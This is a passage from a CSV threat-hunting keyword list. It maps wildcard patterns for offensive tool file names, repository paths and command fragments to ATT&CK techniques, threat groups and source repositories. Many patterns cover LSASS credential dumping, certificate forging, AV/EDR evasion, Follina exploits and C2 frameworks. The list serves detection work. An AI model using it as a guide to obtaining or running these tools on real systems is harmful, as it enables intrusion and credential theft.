tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*fodhelperUACBypass*,offensive_tool_keyword,Earth Lusca Operations Tools ,Earth Lusca Operations Tools and commands,T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090,TA0007 - TA0008,N/A,N/A,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*foiopecknacmiihiocgdjgbjokkpkohc*,greyware_tool_keyword,VPN Professional,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data 
Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*Follina.Ninja*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*follina.py*muban.docx*,offensive_tool_keyword,POC,Just another PoC for the new MSDT-Exploit,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed,1,1,N/A,N/A,4,387,57,2023-04-13T16:46:26Z,2022-06-02T12:33:18Z -*Follina/follina.html*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*Follina/Follinadoc*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*for /f %%i in (C:\Windows\IME\ok.txt)*,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 
- T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*for /r c:\windows\system32\ %i in (*sht*.exe)*,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*for i in {1..65535}*,greyware_tool_keyword,bash port scan,linux commands abused by attackers,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Network Exploitation tools,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*-force-forwardableet-ADComputer*,offensive_tool_keyword,impacket,Impacket is 
a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*foreign_access.cna*,offensive_tool_keyword,cobaltstrike,LSASS Dumping With Foreign Handles,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/alfarom256/BOF-ForeignLsass,1,1,N/A,10,10,96,25,2021-08-23T16:57:08Z,2021-08-21T00:19:29Z -*foreign_lsass * *,offensive_tool_keyword,cobaltstrike,LSASS Dumping With Foreign Handles,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 
T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/alfarom256/BOF-ForeignLsass,1,0,N/A,10,10,96,25,2021-08-23T16:57:08Z,2021-08-21T00:19:29Z -*foreign_lsass.c*,offensive_tool_keyword,cobaltstrike,LSASS Dumping With Foreign Handles,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - 
APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/alfarom256/BOF-ForeignLsass,1,1,N/A,10,10,96,25,2021-08-23T16:57:08Z,2021-08-21T00:19:29Z -*foreign_lsass.x64*,offensive_tool_keyword,cobaltstrike,LSASS Dumping With Foreign Handles,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/alfarom256/BOF-ForeignLsass,1,1,N/A,10,10,96,25,2021-08-23T16:57:08Z,2021-08-21T00:19:29Z -*foreign_lsass.x86*,offensive_tool_keyword,cobaltstrike,LSASS Dumping With Foreign Handles,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/alfarom256/BOF-ForeignLsass,1,1,N/A,10,10,96,25,2021-08-23T16:57:08Z,2021-08-21T00:19:29Z -*forge_ticket.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*forge_ticket_spec.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*ForgeCert.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*ForgeCert-main*,offensive_tool_keyword,ForgeCert,ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.,T1553.002 - T1136.003 - T1059.001,TA0006 - TA0002,N/A,N/A,Defense Evasion,https://github.com/GhostPack/ForgeCert,1,1,N/A,10,6,538,87,2022-10-07T18:18:09Z,2021-06-09T22:04:18Z -*forkatz.exe*,offensive_tool_keyword,forkatz,credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege,T1003.002 - T1558.002 - T1055.001,TA0006 - TA0004,N/A,N/A,Credential 
Access,https://github.com/Barbarisch/forkatz,1,1,N/A,10,2,122,15,2021-05-22T00:23:04Z,2021-05-21T18:42:22Z -*forkatz.sln*,offensive_tool_keyword,forkatz,credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege,T1003.002 - T1558.002 - T1055.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/Barbarisch/forkatz,1,1,N/A,10,2,122,15,2021-05-22T00:23:04Z,2021-05-21T18:42:22Z -*forkatz.vcxproj*,offensive_tool_keyword,forkatz,credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege,T1003.002 - T1558.002 - T1055.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/Barbarisch/forkatz,1,1,N/A,10,2,122,15,2021-05-22T00:23:04Z,2021-05-21T18:42:22Z -*forkatz-main*,offensive_tool_keyword,forkatz,credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege,T1003.002 - T1558.002 - T1055.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/Barbarisch/forkatz,1,1,N/A,10,2,122,15,2021-05-22T00:23:04Z,2021-05-21T18:42:22Z -*-format=dotnet-createsection -sleep*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - 
Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*--format-string ziiiiizzzb * ,offensive_tool_keyword,cobaltstrike,InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/InlineExecute-Assembly,1,0,N/A,10,10,490,114,2023-07-22T23:25:15Z,2021-07-08T17:40:07Z -*--format-string ziiiiizzzib *,offensive_tool_keyword,cobaltstrike,InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 
T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/InlineExecute-Assembly,1,0,N/A,10,10,490,114,2023-07-22T23:25:15Z,2021-07-08T17:40:07Z -*fortalice/bofhound*,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,1,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -*fortra/impacket*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*FortyNorthSecurity*,offensive_tool_keyword,Github Username,FortyNorth Security is a computer security consultancy specializing in offensive security work. We regularly perform red team assessments. pen tests. and more,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/FortyNorthSecurity,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*FortyNorthSecurity/CIMplant*,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,1,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -*FortyNorthSecurity/FunctionalC2*,offensive_tool_keyword,FunctionalC2,A small POC of using Azure Functions to relay communications,T1021.006 - T1132.002 - T1071.001,TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/FortyNorthSecurity/FunctionalC2,1,1,N/A,10,10,58,15,2023-03-30T20:27:38Z,2020-03-12T17:54:50Z -*found-passwords.txt*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*FourEye(shellcode_bypass*,offensive_tool_keyword,FourEye,AV Evasion Tool,T1059 - T1059.001 - T1059.005 - T1027 - T1027.005,TA0002 - TA0005,N/A,N/A,Defense 
Evasion,https://github.com/lengjibo/FourEye,1,0,N/A,10,8,724,154,2021-12-08T11:55:15Z,2020-12-11T01:29:58Z -*FourEye-main*,offensive_tool_keyword,FourEye,AV Evasion Tool,T1059 - T1059.001 - T1059.005 - T1027 - T1027.005,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/lengjibo/FourEye,1,1,N/A,10,8,724,154,2021-12-08T11:55:15Z,2020-12-11T01:29:58Z -*fox-it/adconnectdump*,offensive_tool_keyword,adconnectdump,Dump Azure AD Connect credentials for Azure AD and Active Directory,T1003.004 - T1059.001 - T1082,TA0006 - TA0002 - TA0007,N/A,N/A,Credential Access,https://github.com/fox-it/adconnectdump,1,1,N/A,10,6,506,84,2023-08-21T00:00:08Z,2019-04-09T07:41:42Z -*fox-it/BloodHound*,offensive_tool_keyword,bloodhound,A Python based ingestor for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/fox-it/BloodHound.py,1,1,N/A,10,10,1538,268,2023-09-27T07:56:12Z,2018-02-26T14:44:20Z -*foxlox/hypobrychium*,offensive_tool_keyword,hypobrychium,hypobrychium AV/EDR Bypass,T1562.001 - T1070.004,TA0005,N/A,N/A,Defense Evasion,https://github.com/foxlox/hypobrychium,1,1,N/A,8,1,72,21,2023-07-21T21:13:20Z,2023-07-18T09:55:07Z -*fpc -c Seatbelt*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*FrameManagementAssociationRequest.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network 
protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*FrameManagementDeauthentication.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*FrameManagementProbeRequest.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*FrameManagementReassociationResponse.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*framework/obfuscation/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
